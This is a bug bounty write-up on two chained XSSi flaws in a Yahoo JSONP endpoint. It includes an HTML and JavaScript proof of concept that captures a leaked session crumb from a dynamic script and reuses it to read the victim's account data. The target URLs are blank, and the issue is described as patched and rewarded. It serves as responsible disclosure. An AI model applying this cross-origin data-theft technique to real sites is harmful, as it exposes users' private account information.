Yahoo — Two XSSi vulnerabilities chained to steal user information. ($750 Bounty)

While intercepting requests using Burp Suite I noticed the following request:

When I saw that this was a JSONP endpoint I immediately knew this could potentially be an XSSi vulnerability. However, I noticed that if the value for the .crumb GET parameter wasn’t valid it would return the following response:

At this point I realized that if I could somehow steal the victim's valid .crumb value, I could successfully steal information about their account. I then searched all requests I had intercepted in Burp Suite for my own valid crumb and quickly found it in a dynamic Javascript file located at:

If you go to this page now you will not find the logoutCrumb value since they have patched this issue. However, when I initially discovered this issue the file looked like this:

Now, for people that don't understand how XSSi works: the vulnerability essentially takes advantage of the Same-Origin Policy (SOP) not being applied to the src attribute of a script tag, so a page on any origin can include a cross-origin script and observe the functions it calls. I then created the following Proof of Concept, which steals the valid .crumb value from the dynamic Javascript file shown above and then places that crumb in the .crumb GET parameter of the JSONP request, as seen here, which returns a proper response containing information about the user. Using the code below I was able to extract information:

<html>
<head>
<title>Yahoo XSSi PoC</title>
</head>
<body>
<div style="width: 60%; margin-right: auto; margin-left: auto; margin-bottom: 30px;">
<h1 style="text-align: center;">Proof of Concept</h1>
<b>Dataset 1:</b>
<div id="content1" style="width: 100%; border: 1px solid black; padding: 10px; overflow: scroll; font-family: monospace;"></div>
<b>Dataset 2:</b>
<div id="content2" style="width: 100%; border: 1px solid black; padding: 10px; overflow: scroll; font-family: monospace;"></div>
</div>
<script>
// JSONP callback: the endpoint wraps the account data in a call to this function.
function processDeviceUsers(data) {
  document.getElementById("content1").innerHTML = JSON.stringify(data);
}
// Stub for the config object that the dynamic Javascript file calls; its merge()
// hands us the session object that contains logoutCrumb. It lives at global scope
// so the included file can reach it.
var config_data = {};
var config = {};
config.merge = function (data) { config_data = data; };
window.onload = function () {
  document.getElementById("content2").innerHTML = JSON.stringify(config_data);
  // JSONP URL (omitted from the write-up) with the stolen crumb appended as the .crumb parameter
  var src = "" + config_data.session.logoutCrumb;
  var s = document.createElement('script');
  s.setAttribute('src', src);
  document.body.appendChild(s);
};
</script>
<!-- The original listing has two script includes; both URLs are omitted from the write-up.
     The dynamic Javascript file must be loaded here, before onload fires. -->
<script src=""></script>
<script src=""></script>
</body>
</html>

Below is a screenshot of the report I submitted to Yahoo, for which I received a $750 bug bounty. Overall, I had a great time developing the Proof of Concept for this vulnerability chain and I hope others are able to learn a thing or two from this write-up.